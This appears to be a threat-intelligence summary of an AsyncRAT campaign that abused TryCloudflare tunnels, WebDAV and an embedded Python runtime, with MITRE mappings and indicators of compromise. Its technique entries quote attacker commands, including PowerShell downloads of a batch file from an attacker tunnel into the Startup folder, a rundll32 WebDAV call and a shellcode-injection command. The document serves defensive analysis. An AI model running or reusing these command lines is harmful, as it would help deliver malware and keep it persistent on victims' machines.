Threat actors abused Cloudflare’s free-tier TryCloudflare tunnels and legitimate Python environments to host WebDAV servers and deliver the AsyncRAT remote access trojan, using double-extension phishing lures and living-off-the-land techniques for persistence. The campaign installs an embedded Python runtime, executes ne.py to APC-inject shellcode from new.bin into explorer.exe, and persists via startup batch files while hiding behind trusted services to evade detection. #AsyncRAT #Cloudflare
Keypoints
- Initial access via phishing: victims received Dropbox links to a double-extension Internet Shortcut (.pdf.url) that redirected to TryCloudflare-hosted WebDAV resources.
- Threat actors hosted malicious scripts and payloads on Cloudflare free-tier TryCloudflare tunnels (e.g., plus-condos-thy-redeem.trycloudflare[.]com) to mask delivery under trusted infrastructure.
- Infection chain: as.wsh → anc.wsf → vio.bat/xeno.bat, which download and install an embedded Python runtime and supporting scripts into a local folder (z1man) before executing ne.py and new.bin.
- Persistence achieved via startup folder batch files (ahke.bat, olsm.bat) and living-off-the-land techniques using Windows Script Host, PowerShell, rundll32, svchost, and mounted WebDAV drives.
- Payload and execution: new.bin (Donut-generated shellcode identified as AsyncRAT) is decrypted using a.txt and APC-injected into explorer.exe via the Python script ne.py.
- Attackers used social engineering (opening a legitimate PDF) and legitimate distribution channels (official python.org download) to reduce suspicion and improve reliability of payload execution.
MITRE Techniques
- [T1566 ] Phishing – Initial access via malicious email links and deceptive shortcut files (‘users received a phishing email containing a Dropbox link leading to an Internet Shortcut file(.url)’)
- [T1105 ] Ingress Tool Transfer – Downloading scripts and binaries from remote WebDAV/HTTP locations hosted on TryCloudflare (‘downloads and executes additional malicious scripts hosted on a WebDAV server’)
- [T1059.001 ] PowerShell – Used to download Python, fetch remote files, and extract archives (‘powershell -Command “iwr ‘https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip’ -OutFile ‘C:UsersAppDataLocalTempp.zip’”‘)
- [T1059.003 ] Windows Script Host – Execution of .wsh/.wsf script files to drive the multi-stage infection (‘”C:WINDOWSSystem32WScript.exe” “plus-condos-thy-redeem.trycloudflare[.][email protected]”‘)
- [T1218 ] Signed Binary Proxy Execution – Using signed system binaries (rundll32.exe, svchost.exe) to interact with WebDAV and execute DLL functions (‘rundll32.exe C:WINDOWSsystem32davclnt.dll,DavSetCookie plus-condos-thy-redeem.trycloudflare[.]com@SSL’)
- [T1547.001 ] Boot or Logon Autostart Execution: Startup Items – Persisting by placing batch files in the user Startup folder (‘iwr ‘https://plus-condos-thy-redeem.trycloudflare[.]com/ahke.bat’ -OutFile ‘C:UsersAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupahke.bat”)
- [T1055.004 ] Process Injection: Asynchronous Procedure Call (APC) Injection – ne.py performs APC-style injection to run shellcode from new.bin inside explorer.exe (‘python ne.py -i new.bin -k a.txt’ and described as Polymorphic APC Injection)
Indicators of Compromise
- [Domain ] TryCloudflare tunnel domains used to host WebDAV and payloads – plus-condos-thy-redeem.trycloudflare[.]com, owners-insertion-rentals-pursuit.trycloudflare[.]com (and other trycloudflare[.]com tunnels)
- [IP Address ] Remote hosting and delivery servers – 87[.]106[.]191[.]217 (active server hosting components), 104[.]16[.]230[.]132 (Cloudflare edge seen in connections)
- [File names ] Malicious scripts and payloads observed in the chain – Rechnung zu Auftrag W19248960825.pdf.zip, Rechnung zu Auftrag W19248960825.pdf.url (initial lure), and other artifacts like as.wsh, anc.wsf, vio.bat, xeno.bat, ne.py, new.bin, a.txt
- [URLs ] Download and delivery URLs used in the campaign – hxxps://dl[.]dropboxusercontent[.]com/…/Rechnung-zu-Auftrag-W19248960825.pdf.zip (phishing delivery), https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip (embedded Python download)
- [File paths ] Local installation and execution paths used on victims – C:UsersAppDataLocalz1mannew.bin, C:UsersAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupahke.bat (persistence)